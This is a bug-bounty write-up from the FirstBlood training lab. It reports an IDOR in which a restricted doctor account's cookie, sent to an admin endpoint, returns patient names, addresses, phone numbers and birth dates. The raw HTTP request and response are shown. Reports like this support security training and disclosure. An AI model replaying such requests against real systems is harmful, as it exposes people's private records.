FirstBlood-#128 — IDOR - Restricted user can view the details of hospital user.
This issue was discovered on FirstBlood v1
On 2021-05-10, ibruteforce Level 4 reported:
Using the credentials as shown in https://www.bugbountyhunter.com/hackevents/report?id=123, it was understood that it was a restricted doctors account where full details aren't visible.
However, you could send a direct request to
POST /drpanel/drapi/qp.phpalong with the
nameparameter using the restricted accounts cookie to view the full account information.
Login with the credentials obtained using the methods shown in report #123.
On a new incognito tab, login with the drAdmin credentials given by bbhunter.
Once logged in, keep a note of your cookie which starts with
drps. It should look something like
Now on the incognito tab, on the dashboard, click on the appointment details and intercept the proxy.
- Now, make the same request with the restricted users cookie,
drps=25bbddaccaa27a8bc23b6c212in this case.
POST /drpanel/drapi/qp.php HTTP/1.1 Host: firstbloodhackers.com:49387 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Prefer: safe Content-Type: application/x-www-form-urlencoded Content-Length: 9 Origin: http://firstbloodhackers.com:49387 DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49387/drpanel/index.php Cookie: drps=25bbddaccaa27a8bc23b6c212 name=Sean
HTTP/1.1 200 OK Server: nginx Date: Mon, 10 May 2021 15:47:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 228 Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>
As you can see, using another endpoint you can leak arbitrary users emails.
FirstBlood ID: 11
Vulnerability Type: Application/Business Logic
Administrator endpoints can be accessed by non privileged doctor accounts which reveals sensitive patient information.